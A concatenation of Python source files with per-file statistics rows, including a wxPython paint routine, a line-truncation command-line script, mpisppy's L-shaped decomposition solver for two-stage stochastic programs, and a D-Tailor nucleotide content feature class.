wx.PyControl.__init__(self, parent, id, pos, size, wx.NO_BORDER)
self._mgr = mgr
# self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)
def OnPaint(self, event):
dc = wx.PaintDC(self)
size = self.GetClientSize()
s = ("Size: %d x %d") % (size.x, size.y)
dc.SetFont(wx.NORMAL_FONT)
w, height = dc.GetTextExtent(s)
height = height + 3
dc.SetBrush(wx.WHITE_BRUSH)
dc.SetPen(wx.WHITE_PEN)
dc.DrawRectangle(0, 0, size.x, size.y)
dc.SetPen(wx.LIGHT_GREY_PEN)
dc.DrawLine(0, 0, size.x, size.y)
dc.DrawLine(0, size.y, size.x, 0)
dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2))
if self._mgr:
pi = self._mgr.GetPane(self)
s = ("Layer: %d") % pi.dock_layer
w, h = dc.GetTextExtent(s)
dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 1))
s = ("Dock: %d Row: %d") % (pi.dock_direction, pi.dock_row)
w, h = dc.GetTextExtent(s)
dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 2))
s = ("Position: %d") % pi.dock_pos
w, h = dc.GetTextExtent(s)
dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 3))
s = ("Proportion: %d") % pi.dock_proportion
w, h = dc.GetTextExtent(s)
dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 4))
def OnEraseBackground(self, event):
# intentionally empty
pass
def OnSize(self, event):
self.Refresh()
event.Skip()
| 47.589021 | 237 | 0.595479 | 6,624 | 64,150 | 5.596014 | 0.129378 | 0.010386 | 0.013219 | 0.012464 | 0.460586 | 0.390579 | 0.352568 | 0.311724 | 0.278245 | 0.265809 | 0 | 0.007771 | 0.287872 | 64,150 | 1,347 | 238 | 47.62435 | 0.803647 | 0.219111 | 0 | 0.300842 | 0 | 0 | 0.103892 | 0.012408 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067389 | false | 0.002407 | 0.033694 | 0 | 0.134777 | 0.013237 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc96dc65fba4dfeccca21923ae5c19d56187622 | 1,042 | py | Python | pyscripts/truncate_lines.py | joseph62/Scripts | 13aab2a51957894f4d524b7a868cb7e51dbba980 | [
"MIT"
] | null | null | null | pyscripts/truncate_lines.py | joseph62/Scripts | 13aab2a51957894f4d524b7a868cb7e51dbba980 | [
"MIT"
] | null | null | null | pyscripts/truncate_lines.py | joseph62/Scripts | 13aab2a51957894f4d524b7a868cb7e51dbba980 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import sys
import argparse
import signal
DEFAULT_LINE_LENGTH = 80
def parse_arguments(args):
parser = argparse.ArgumentParser(
description="Trucate incoming lines to a specified length with an optional suffix"
)
parser.add_argument(
"-l", "--length", help="The maximum length of each line", type=int, default=80
)
parser.add_argument(
"-s",
"--suffix",
help="A suffix to add to the end of truncated lines",
default="",
)
return parser.parse_args(args)
def truncate_lines_from_handle(handle, length, suffix):
for line in handle:
if len(line) > length:
yield f"{line[:length-len(suffix)]}{suffix}"
else:
yield line
def main(args):
args = parse_arguments(args)
for line in truncate_lines_from_handle(sys.stdin, args.length, args.suffix):
print(line)
return 0
if __name__ == "__main__":
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
sys.exit(main(sys.argv[1:]))
| 22.652174 | 90 | 0.642035 | 137 | 1,042 | 4.722628 | 0.467153 | 0.046368 | 0.055641 | 0.071097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008906 | 0.245681 | 1,042 | 45 | 91 | 23.155556 | 0.814249 | 0.021113 | 0 | 0.0625 | 0 | 0 | 0.20314 | 0.034347 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.09375 | 0 | 0.25 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfcb37f297e73011c6f83e4feb6d86e5b96b07bc | 30,944 | py | Python | mpisppy/opt/lshaped.py | Matthew-Signorotti/mpi-sppy | 5c6b4b8cd26af517ff09706d11751f2fb05b1b5f | [
"BSD-3-Clause"
] | null | null | null | mpisppy/opt/lshaped.py | Matthew-Signorotti/mpi-sppy | 5c6b4b8cd26af517ff09706d11751f2fb05b1b5f | [
"BSD-3-Clause"
] | null | null | null | mpisppy/opt/lshaped.py | Matthew-Signorotti/mpi-sppy | 5c6b4b8cd26af517ff09706d11751f2fb05b1b5f | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2020 by B. Knueven, D. Mildebrath, C. Muir, J-P Watson, and D.L. Woodruff
# This software is distributed under the 3-clause BSD License.
import pyomo.environ as pyo
import mpisppy.utils.sputils as sputils
import numpy as np
import itertools
import time
import sys
import mpisppy.spbase as spbase
from mpisppy import MPI
from pyomo.core.plugins.transform.discrete_vars import RelaxIntegerVars
from mpisppy.utils.sputils import find_active_objective
from mpisppy.utils.lshaped_cuts import LShapedCutGenerator
from mpisppy.spopt import set_instance_retry
from pyomo.core import (
Objective, SOSConstraint, Constraint, Var
)
from pyomo.core.expr.visitor import identify_variables
from pyomo.repn.standard_repn import generate_standard_repn
from pyomo.core.expr.numeric_expr import LinearExpression
class LShapedMethod(spbase.SPBase):
""" Base class for the L-shaped method for two-stage stochastic programs.
Warning:
This class explicitly assumes minimization.
Args:
options (dict):
Dictionary of options. Possible (optional) options include
- root_scenarios (list) - List of scenario names to include as
part of the root problem (default [])
- store_subproblems (boolean) - If True, the BendersDecomp object
will maintain a dictionary containing the subproblems created by
the BendersCutGenerator.
- relax_root (boolean) - If True, the LP relaxation of the root
problem is solved (i.e. integer variables in the root problem
are relaxed).
- scenario_creator_kwargs (dict) - Keyword args to pass to the scenario_creator.
- valid_eta_lb (dict) - Dictionary mapping scenario names to valid
lower bounds for the eta variables--i.e., a valid lower (outer)
bound on the optimal objective value for each scenario. If none
are provided, the lower bound is set to -sys.maxsize *
scenario_prob, which may cause numerical errors.
- indx_to_stage (dict) - Dictionary mapping the index of every
variable in the model to the stage they belong to.
all_scenario_names (list):
List of all scenarios names present in the model (strings).
scenario_creator (callable):
Function which take a scenario name (string) and returns a
Pyomo Concrete model with some things attached.
scenario_denouement (callable, optional):
Function which does post-processing and reporting.
all_nodenames (list, optional):
List of all node name (strings). Can be `None` for two-stage
problems.
mpicomm (MPI comm, optional):
MPI communicator to use between all scenarios. Default is
`MPI.COMM_WORLD`.
scenario_creator_kwargs (dict, optional):
Keyword arguments to pass to `scenario_creator`.
"""
def __init__(
self,
options,
all_scenario_names,
scenario_creator,
scenario_denouement=None,
all_nodenames=None,
mpicomm=None,
scenario_creator_kwargs=None,
):
super().__init__(
options,
all_scenario_names,
scenario_creator,
scenario_denouement=scenario_denouement,
all_nodenames=all_nodenames,
mpicomm=mpicomm,
scenario_creator_kwargs=scenario_creator_kwargs,
)
if self.multistage:
raise Exception("LShaped does not currently support multiple stages")
self.options = options
self.options_check()
self.all_scenario_names = all_scenario_names
self.root = None
self.root_vars = None
self.scenario_count = len(all_scenario_names)
self.store_subproblems = False
if "store_subproblems" in options:
self.store_subproblems = options["store_subproblems"]
self.root_scenarios = None
if "root_scenarios" in options:
self.root_scenarios = options["root_scenarios"]
self.relax_root = False
if "relax_root" in options:
self.relax_root = options["relax_root"]
self.valid_eta_lb = None
if "valid_eta_lb" in options:
self.valid_eta_lb = options["valid_eta_lb"]
self.compute_eta_bound = False
else: # fit the user does not provide a bound, compute one
self.valid_eta_lb = { scen : (-sys.maxsize - 1) * 1. / len(self.all_scenario_names) \
for scen in self.all_scenario_names }
self.compute_eta_bound = True
if scenario_creator_kwargs is None:
self.scenario_creator_kwargs = dict()
else:
self.scenario_creator_kwargs = scenario_creator_kwargs
self.indx_to_stage = None
self.has_valid_eta_lb = self.valid_eta_lb is not None
self.has_root_scens = self.root_scenarios is not None
if self.store_subproblems:
self.subproblems = dict.fromkeys(scenario_names)
def options_check(self):
""" Check to ensure that the user-specified options are valid. Requried
options are:
- root_solver (string) - Solver to use for the root problem.
- sp_solver (string) - Solver to use for the subproblems.
"""
required = ["root_solver", "sp_solver"]
if "root_solver_options" not in self.options:
self.options["root_solver_options"] = dict()
if "sp_solver_options" not in self.options:
self.options["sp_solver_options"] = dict()
self._options_check(required, self.options)
def _add_root_etas(self, root, index):
def _eta_bounds(m, s):
return (self.valid_eta_lb[s],None)
root.eta = pyo.Var(index, within=pyo.Reals, bounds=_eta_bounds)
def _create_root_no_scenarios(self):
# using the first scenario as a basis
root = self.scenario_creator(
self.all_scenario_names[0], **self.scenario_creator_kwargs
)
if self.relax_root:
RelaxIntegerVars().apply_to(root)
nonant_list, nonant_ids = _get_nonant_ids(root)
self.root_vars = nonant_list
for constr_data in list(itertools.chain(
root.component_data_objects(SOSConstraint, active=True, descend_into=True)
, root.component_data_objects(Constraint, active=True, descend_into=True))):
if not _first_stage_only(constr_data, nonant_ids):
_del_con(constr_data)
# delete the second stage variables
for var in list(root.component_data_objects(Var, active=True, descend_into=True)):
if id(var) not in nonant_ids:
_del_var(var)
self._add_root_etas(root, self.all_scenario_names)
# pulls the current objective expression, adds in the eta variables,
# and removes the second stage variables from the expression
obj = find_active_objective(root)
repn = generate_standard_repn(obj.expr, quadratic=True)
if len(repn.nonlinear_vars) > 0:
raise ValueError("LShaped does not support models with nonlinear objective functions")
linear_vars = list()
linear_coefs = list()
quadratic_vars = list()
quadratic_coefs = list()
## we'll assume the constant is part of stage 1 (wlog it is), just
## like the first-stage bits of the objective
constant = repn.constant
## only keep the first stage variables in the objective
for coef, var in zip(repn.linear_coefs, repn.linear_vars):
id_var = id(var)
if id_var in nonant_ids:
linear_vars.append(var)
linear_coefs.append(coef)
for coef, (x,y) in zip(repn.quadratic_coefs, repn.quadratic_vars):
id_x = id(x)
id_y = id(y)
if id_x in nonant_ids and id_y in nonant_ids:
quadratic_coefs.append(coef)
quadratic_vars.append((x,y))
# checks if model sense is max, if so negates the objective
if not self.is_minimizing:
for i,coef in enumerate(linear_coefs):
linear_coefs[i] = -coef
for i,coef in enumerate(quadratic_coefs):
quadratic_coefs[i] = -coef
# add the etas
for var in root.eta.values():
linear_vars.append(var)
linear_coefs.append(1)
expr = LinearExpression(constant=constant, linear_coefs=linear_coefs,
linear_vars=linear_vars)
if quadratic_coefs:
expr += pyo.quicksum(
(coef*x*y for coef,(x,y) in zip(quadratic_coefs, quadratic_vars))
)
root.del_component(obj)
# set root objective function
root.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
self.root = root
def _create_root_with_scenarios(self):
ef_scenarios = self.root_scenarios
## we want the correct probabilities to be set when
## calling create_EF
if len(ef_scenarios) > 1:
def scenario_creator_wrapper(name, **creator_options):
scenario = self.scenario_creator(name, **creator_options)
if not hasattr(scenario, '_mpisppy_probability'):
scenario._mpisppy_probability = 1./len(self.all_scenario_names)
return scenario
root = sputils.create_EF(
ef_scenarios,
scenario_creator_wrapper,
scenario_creator_kwargs=self.scenario_creator_kwargs,
)
nonant_list, nonant_ids = _get_nonant_ids_EF(root)
else:
root = self.scenario_creator(
ef_scenarios[0],
**self.scenario_creator_kwargs,
)
if not hasattr(root, '_mpisppy_probability'):
root._mpisppy_probability = 1./len(self.all_scenario_names)
nonant_list, nonant_ids = _get_nonant_ids(root)
self.root_vars = nonant_list
# creates the eta variables for scenarios that are NOT selected to be
# included in the root problem
eta_indx = [scenario_name for scenario_name in self.all_scenario_names
if scenario_name not in self.root_scenarios]
self._add_root_etas(root, eta_indx)
obj = find_active_objective(root)
repn = generate_standard_repn(obj.expr, quadratic=True)
if len(repn.nonlinear_vars) > 0:
raise ValueError("LShaped does not support models with nonlinear objective functions")
linear_vars = list(repn.linear_vars)
linear_coefs = list(repn.linear_coefs)
quadratic_coefs = list(repn.quadratic_coefs)
# adjust coefficients by scenario/bundle probability
scen_prob = root._mpisppy_probability
for i,var in enumerate(repn.linear_vars):
if id(var) not in nonant_ids:
linear_coefs[i] *= scen_prob
for i,(x,y) in enumerate(repn.quadratic_vars):
# only multiply through once
if id(x) not in nonant_ids:
quadratic_coefs[i] *= scen_prob
elif id(y) not in nonant_ids:
quadratic_coefs[i] *= scen_prob
# NOTE: the LShaped code negates the objective, so
# we do the same here for consistency
if not self.is_minimizing:
for i,coef in enumerate(linear_coefs):
linear_coefs[i] = -coef
for i,coef in enumerate(quadratic_coefs):
quadratic_coefs[i] = -coef
# add the etas
for var in root.eta.values():
linear_vars.append(var)
linear_coefs.append(1)
expr = LinearExpression(constant=repn.constant, linear_coefs=linear_coefs,
linear_vars=linear_vars)
if repn.quadratic_vars:
expr += pyo.quicksum(
(coef*x*y for coef,(x,y) in zip(quadratic_coefs, repn.quadratic_vars))
)
root.del_component(obj)
# set root objective function
root.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
self.root = root
def _create_shadow_root(self):
root = pyo.ConcreteModel()
arb_scen = self.local_scenarios[self.local_scenario_names[0]]
nonants = arb_scen._mpisppy_node_list[0].nonant_vardata_list
root_vars = list()
for v in nonants:
nonant_shadow = pyo.Var(name=v.name)
root.add_component(v.name, nonant_shadow)
root_vars.append(nonant_shadow)
if self.has_root_scens:
eta_indx = [scenario_name for scenario_name in self.all_scenario_names
if scenario_name not in self.root_scenarios]
else:
eta_indx = self.all_scenario_names
self._add_root_etas(root, eta_indx)
root.obj = None
self.root = root
self.root_vars = root_vars
def set_eta_bounds(self):
if self.compute_eta_bound:
## for scenarios not in self.local_scenarios, these will be a large negative number
this_etas_lb = np.fromiter((self.valid_eta_lb[scen] for scen in self.all_scenario_names),
float, count=len(self.all_scenario_names))
all_etas_lb = np.empty_like(this_etas_lb)
self.mpicomm.Allreduce(this_etas_lb, all_etas_lb, op=MPI.MAX)
for idx, s in enumerate(self.all_scenario_names):
self.valid_eta_lb[s] = all_etas_lb[idx]
# root may not have etas for every scenarios
for s, v in self.root.eta.items():
v.setlb(self.valid_eta_lb[s])
def create_root(self):
""" creates a ConcreteModel from one of the problem scenarios then
modifies the model to serve as the root problem
"""
if self.cylinder_rank == 0:
if self.has_root_scens:
self._create_root_with_scenarios()
else:
self._create_root_no_scenarios()
else:
## if we're not rank0, just create a root to
## hold the nonants and etas; rank0 will do
## the optimizing
self._create_shadow_root()
def attach_nonant_var_map(self, scenario_name):
instance = self.local_scenarios[scenario_name]
subproblem_to_root_vars_map = pyo.ComponentMap()
for var, rvar in zip(instance._mpisppy_data.nonant_indices.values(), self.root_vars):
if var.name not in rvar.name:
raise Exception("Error: Complicating variable mismatch, sub-problem variables changed order")
subproblem_to_root_vars_map[var] = rvar
# this is for interefacing with PH code
instance._mpisppy_model.subproblem_to_root_vars_map = subproblem_to_root_vars_map
def create_subproblem(self, scenario_name):
""" the subproblem creation function passed into the
BendersCutsGenerator
"""
instance = self.local_scenarios[scenario_name]
nonant_list, nonant_ids = _get_nonant_ids(instance)
# NOTE: since we use generate_standard_repn below, we need
# to unfix any nonants so they'll properly appear
# in the objective
fixed_nonants = [ var for var in nonant_list if var.fixed ]
for var in fixed_nonants:
var.fixed = False
# pulls the scenario objective expression, removes the first stage variables, and sets the new objective
obj = find_active_objective(instance)
if not hasattr(instance, "_mpisppy_probability"):
instance._mpisppy_probability = 1. / self.scenario_count
_mpisppy_probability = instance._mpisppy_probability
repn = generate_standard_repn(obj.expr, quadratic=True)
if len(repn.nonlinear_vars) > 0:
raise ValueError("LShaped does not support models with nonlinear objective functions")
linear_vars = list()
linear_coefs = list()
quadratic_vars = list()
quadratic_coefs = list()
## we'll assume the constant is part of stage 1 (wlog it is), just
## like the first-stage bits of the objective
constant = repn.constant
## only keep the second stage variables in the objective
for coef, var in zip(repn.linear_coefs, repn.linear_vars):
id_var = id(var)
if id_var not in nonant_ids:
linear_vars.append(var)
linear_coefs.append(_mpisppy_probability*coef)
for coef, (x,y) in zip(repn.quadratic_coefs, repn.quadratic_vars):
id_x = id(x)
id_y = id(y)
if id_x not in nonant_ids or id_y not in nonant_ids:
quadratic_coefs.append(_mpisppy_probability*coef)
quadratic_vars.append((x,y))
# checks if model sense is max, if so negates the objective
if not self.is_minimizing:
for i,coef in enumerate(linear_coefs):
linear_coefs[i] = -coef
for i,coef in enumerate(quadratic_coefs):
quadratic_coefs[i] = -coef
expr = LinearExpression(constant=constant, linear_coefs=linear_coefs,
linear_vars=linear_vars)
if quadratic_coefs:
expr += pyo.quicksum(
(coef*x*y for coef,(x,y) in zip(quadratic_coefs, quadratic_vars))
)
instance.del_component(obj)
# set subproblem objective function
instance.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
## need to do this here for validity if computing the eta bound
if self.relax_root:
# relaxes any integrality constraints for the subproblem
RelaxIntegerVars().apply_to(instance)
if self.compute_eta_bound:
for var in fixed_nonants:
var.fixed = True
opt = pyo.SolverFactory(self.options["sp_solver"])
if self.options["sp_solver_options"]:
for k,v in self.options["sp_solver_options"].items():
opt.options[k] = v
if sputils.is_persistent(opt):
set_instance_retry(instance, opt, scenario_name)
res = opt.solve(tee=False)
else:
res = opt.solve(instance, tee=False)
eta_lb = res.Problem[0].Lower_bound
self.valid_eta_lb[scenario_name] = eta_lb
# if not done above
if not self.relax_root:
# relaxes any integrality constraints for the subproblem
RelaxIntegerVars().apply_to(instance)
# iterates through constraints and removes first stage constraints from the model
# the id dict is used to improve the speed of identifying the stage each variables belongs to
for constr_data in list(itertools.chain(
instance.component_data_objects(SOSConstraint, active=True, descend_into=True)
, instance.component_data_objects(Constraint, active=True, descend_into=True))):
if _first_stage_only(constr_data, nonant_ids):
_del_con(constr_data)
# creates the sub map to remove first stage variables from objective expression
complicating_vars_map = pyo.ComponentMap()
subproblem_to_root_vars_map = pyo.ComponentMap()
# creates the complicating var map that connects the first stage variables in the sub problem to those in
# the root problem -- also set the bounds on the subproblem root vars to be none for better cuts
for var, rvar in zip(nonant_list, self.root_vars):
if var.name not in rvar.name: # rvar.name may be part of a bundle
raise Exception("Error: Complicating variable mismatch, sub-problem variables changed order")
complicating_vars_map[rvar] = var
subproblem_to_root_vars_map[var] = rvar
# these are already enforced in the root
# don't need to be enfored in the subproblems
var.setlb(None)
var.setub(None)
var.fixed = False
# this is for interefacing with PH code
instance._mpisppy_model.subproblem_to_root_vars_map = subproblem_to_root_vars_map
if self.store_subproblems:
self.subproblems[scenario_name] = instance
return instance, complicating_vars_map
def lshaped_algorithm(self, converger=None):
""" function that runs the lshaped.py algorithm
"""
if converger:
converger = converger(self, self.cylinder_rank, self.n_proc)
max_iter = 30
if "max_iter" in self.options:
max_iter = self.options["max_iter"]
tol = 1e-8
if "tol" in self.options:
tol = self.options["tol"]
verbose = True
if "verbose" in self.options:
verbose = self.options["verbose"]
root_solver = self.options["root_solver"]
sp_solver = self.options["sp_solver"]
# creates the root problem
self.create_root()
m = self.root
assert hasattr(m, "obj")
# prevents problems from first stage variables becoming unconstrained
# after processing
_init_vars(self.root_vars)
# sets up the BendersCutGenerator object
m.bender = LShapedCutGenerator()
m.bender.set_input(root_vars=self.root_vars, tol=tol, comm=self.mpicomm)
# let the cut generator know who's using it, probably should check that this is called after set input
m.bender.set_ls(self)
# set the eta variables, removing this from the add_suproblem function so we can
# Pass all the scenarios in the problem to bender.add_subproblem
# and let it internally handle which ranks get which scenarios
if self.has_root_scens:
sub_scenarios = [
scenario_name for scenario_name in self.local_scenario_names
if scenario_name not in self.root_scenarios
]
else:
sub_scenarios = self.local_scenario_names
for scenario_name in self.local_scenario_names:
if scenario_name in sub_scenarios:
subproblem_fn_kwargs = dict()
subproblem_fn_kwargs['scenario_name'] = scenario_name
m.bender.add_subproblem(
subproblem_fn=self.create_subproblem,
subproblem_fn_kwargs=subproblem_fn_kwargs,
root_eta=m.eta[scenario_name],
subproblem_solver=sp_solver,
subproblem_solver_options=self.options["sp_solver_options"]
)
else:
self.attach_nonant_var_map(scenario_name)
# set the eta bounds if computed
# by self.create_subproblem
self.set_eta_bounds()
if self.cylinder_rank == 0:
opt = pyo.SolverFactory(root_solver)
if opt is None:
raise Exception("Error: Failed to Create Master Solver")
# set options
for k,v in self.options["root_solver_options"].items():
opt.options[k] = v
is_persistent = sputils.is_persistent(opt)
if is_persistent:
set_instance_retry(m, opt, "root")
t = time.time()
res, t1, t2 = None, None, None
# benders solve loop, repeats the benders root - subproblem
# loop until either a no more cuts can are generated
# or the maximum iterations limit is reached
for self.iter in range(max_iter):
if verbose and self.cylinder_rank == 0:
if self.iter > 0:
print("Current Iteration:", self.iter + 1, "Time Elapsed:", "%7.2f" % (time.time() - t), "Time Spent on Last Master:", "%7.2f" % t1,
"Time Spent Generating Last Cut Set:", "%7.2f" % t2, "Current Objective:", "%7.2f" % m.obj.expr())
else:
print("Current Iteration:", self.iter + 1, "Time Elapsed:", "%7.2f" % (time.time() - t), "Current Objective: -Inf")
t1 = time.time()
x_vals = np.zeros(len(self.root_vars))
eta_vals = np.zeros(self.scenario_count)
outer_bound = np.zeros(1)
if self.cylinder_rank == 0:
if is_persistent:
res = opt.solve(tee=False)
else:
res = opt.solve(m, tee=False)
# LShaped is always minimizing
outer_bound[0] = res.Problem[0].Lower_bound
for i, var in enumerate(self.root_vars):
x_vals[i] = var.value
for i, eta in enumerate(m.eta.values()):
eta_vals[i] = eta.value
self.mpicomm.Bcast(x_vals, root=0)
self.mpicomm.Bcast(eta_vals, root=0)
self.mpicomm.Bcast(outer_bound, root=0)
if self.is_minimizing:
self._LShaped_bound = outer_bound[0]
else:
# LShaped is always minimizing, so negate
# the outer bound for sharing broadly
self._LShaped_bound = -outer_bound[0]
if self.cylinder_rank != 0:
for i, var in enumerate(self.root_vars):
var._value = x_vals[i]
for i, eta in enumerate(m.eta.values()):
eta._value = eta_vals[i]
t1 = time.time() - t1
# The hub object takes precedence over the converger
# We'll send the nonants now, and check for a for
# convergence
if self.spcomm:
self.spcomm.sync(send_nonants=True)
if self.spcomm.is_converged():
break
t2 = time.time()
cuts_added = m.bender.generate_cut()
t2 = time.time() - t2
if self.cylinder_rank == 0:
for c in cuts_added:
if is_persistent:
opt.add_constraint(c)
if verbose and len(cuts_added) == 0:
print(
f"Converged in {self.iter+1} iterations.\n"
f"Total Time Elapsed: {time.time()-t:7.2f} "
f"Time Spent on Last Master: {t1:7.2f} "
f"Time spent verifying second stage: {t2:7.2f} "
f"Final Objective: {m.obj.expr():7.2f}"
)
self.first_stage_solution_available = True
self.tree_solution_available = True
break
if verbose and self.iter == max_iter - 1:
print("WARNING MAX ITERATION LIMIT REACHED !!! ")
else:
if len(cuts_added) == 0:
break
# The hub object takes precedence over the converger
if self.spcomm:
self.spcomm.sync(send_nonants=False)
if self.spcomm.is_converged():
break
if converger:
converger.convergence_value()
if converger.is_converged():
if verbose and self.cylinder_rank == 0:
print(
f"Converged to user criteria in {self.iter+1} iterations.\n"
f"Total Time Elapsed: {time.time()-t:7.2f} "
f"Time Spent on Last Master: {t1:7.2f} "
f"Time spent verifying second stage: {t2:7.2f} "
f"Final Objective: {m.obj.expr():7.2f}"
)
break
return res
def _del_con(c):
parent = c.parent_component()
if parent.is_indexed():
parent.__delitem__(c.index())
else:
assert parent is c
c.parent_block().del_component(c)
def _del_var(v):
parent = v.parent_component()
if parent.is_indexed():
parent.__delitem__(v.index())
else:
assert parent is v
block = v.parent_block()
block.del_component(v)
def _get_nonant_ids(instance):
assert len(instance._mpisppy_node_list) == 1
# set comprehension
nonant_list = instance._mpisppy_node_list[0].nonant_vardata_list
return nonant_list, { id(var) for var in nonant_list }
def _get_nonant_ids_EF(instance):
assert len(instance._mpisppy_data.nlens) == 1
ndn, nlen = list(instance._mpisppy_data.nlens.items())[0]
## this is for the cut variables, so we just need (and want)
## exactly one set of them
nonant_list = list(instance.ref_vars[ndn,i] for i in range(nlen))
## this is for adjusting the objective, so needs all the nonants
## in the EF
snames = instance._ef_scenario_names
nonant_ids = set()
for s in snames:
nonant_ids.update( (id(v) for v in \
getattr(instance, s)._mpisppy_node_list[0].nonant_vardata_list)
)
return nonant_list, nonant_ids
def _first_stage_only(constr_data, nonant_ids):
""" iterates through the constraint in a scenario and returns if it only
has first stage variables
"""
for var in identify_variables(constr_data.body):
if id(var) not in nonant_ids:
return False
return True
def _init_vars(varlist):
'''
for every pyomo var in varlist without a value,
sets it to the lower bound (if it exists), or
the upper bound (if it exists, and the lower bound
does note) or 0 (if neither bound exists).
'''
value = pyo.value
for var in varlist:
if var.value is not None:
continue
if var.lb is not None:
var.set_value(value(var.lb))
elif var.ub is not None:
var.set_value(value(var.ub))
else:
var.set_value(0)
def main():
import mpisppy.tests.examples.farmer as ref
import os
# Turn off output from all ranks except rank 1
if MPI.COMM_WORLD.Get_rank() != 0:
sys.stdout = open(os.devnull, 'w')
scenario_names = ['scen' + str(i) for i in range(3)]
bounds = {i:-432000 for i in scenario_names}
options = {
"root_solver": "gurobi_persistent",
"sp_solver": "gurobi_persistent",
"sp_solver_options" : {"threads" : 1},
"valid_eta_lb": bounds,
"max_iter": 10,
}
ls = LShapedMethod(options, scenario_names, ref.scenario_creator)
res = ls.lshaped_algorithm()
if ls.cylinder_rank == 0:
print(res)
if __name__ == '__main__':
main()
| 39.824968 | 152 | 0.607226 | 3,863 | 30,944 | 4.660368 | 0.137458 | 0.020941 | 0.015997 | 0.014442 | 0.433817 | 0.385547 | 0.341332 | 0.297173 | 0.255791 | 0.238016 | 0 | 0.005302 | 0.317283 | 30,944 | 776 | 153 | 39.876289 | 0.846871 | 0.207601 | 0 | 0.358527 | 0 | 0 | 0.066363 | 0 | 0 | 0 | 0 | 0 | 0.00969 | 1 | 0.03876 | false | 0 | 0.034884 | 0.001938 | 0.091085 | 0.011628 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfcbc5d0c314cd0ac9510073757086968e66ea31 | 4,812 | py | Python | Features/NucleotideContent.py | jcg/d-tailor | 7ea83bcf7a2cda21eb8727575ff2b20ac8b49606 | [
"BSD-2-Clause"
] | 14 | 2016-05-19T08:31:44.000Z | 2021-08-05T08:56:56.000Z | Features/NucleotideContent.py | jcg/d-tailor | 7ea83bcf7a2cda21eb8727575ff2b20ac8b49606 | [
"BSD-2-Clause"
] | 1 | 2018-09-25T12:00:23.000Z | 2018-12-10T18:42:31.000Z | Features/NucleotideContent.py | jcg/d-tailor | 7ea83bcf7a2cda21eb8727575ff2b20ac8b49606 | [
"BSD-2-Clause"
] | 4 | 2016-06-23T21:40:49.000Z | 2021-02-02T03:05:35.000Z | '''
Created on Nov 16, 2011
@author: jcg
'''
from Features.Feature import Feature
import Functions
from uuid import uuid4
class NucleotideContent(Feature):
"""
Nucleotide Content Feature
solution - solution where nucleotide content should be computed
label - some label to append to the name
hi_range - start and end position to calculate nucleotide content - a tuple in the form (start, end)
mutable_region - a list with all bases that can be mutated
cds_region - a pair with begin and end of CDSs - example: (0,100)
keep_aa - boolean option indicating if in the design mode amino acids should be kept
"""
def __init__(self, nucleotideContentObject = None, solution=None, label="", args = { 'ntcontent_range' : (0,9),
'mutable_region' : None,
'cds_region' : None,
'keep_aa' : True }):
if nucleotideContentObject == None: #create new instance
#General properties of feature
Feature.__init__(self, solution=solution, label=label)
#Specifics of this Feature
self.ntcontent_range = args['ntcontent_range']
self.sequence = solution.sequence[self.ntcontent_range[0]:self.ntcontent_range[1]+1]
self.mutable_region = args['mutable_region'] if args.has_key('mutable_region') else solution.mutable_region
self.cds_region = args['cds_region'] if args.has_key('cds_region') else solution.cds_region
self.keep_aa = args['keep_aa'] if args.has_key('keep_aa') else solution.keep_aa
self.set_scores()
self.set_level()
else:
Feature.__init__(self, nucleotideContentObject)
self.ntcontent_range = nucleotideContentObject.ntcontent_range
self.sequence = nucleotideContentObject.sequence
self.mutable_region = nucleotideContentObject.mutable_region
self.cds_region = nucleotideContentObject.cds_region
self.keep_aa = nucleotideContentObject.keep_aa
self.scores = nucleotideContentObject.scores
def set_scores(self, scoring_function = Functions.analyze_ntcontent):
self.scores = Functions.appendLabelToDict(scoring_function(self.sequence), self.label)
def mutate(self, operator=Functions.SimpleNtContentOperator):
if not self.targetInstructions:
return None
new_seq = operator(self.solution.sequence, self.targetInstructions['direction'], self.nucleotides, self.mutable_region, self.cds_region, keep_aa=self.keep_aa)
if not new_seq:
return None
return Solution.Solution(sol_id=str(uuid4().int), sequence=new_seq, cds_region = self.cds_region, mutable_region = list(self.mutable_region), parent=self.solution, design=self.solution.designMethod)
class NucleotideContentAT(NucleotideContent):
"""
Check AT content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['a','t']
self.set_level()
class NucleotideContentGC(NucleotideContent):
"""
Check GC content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['g','c']
self.set_level()
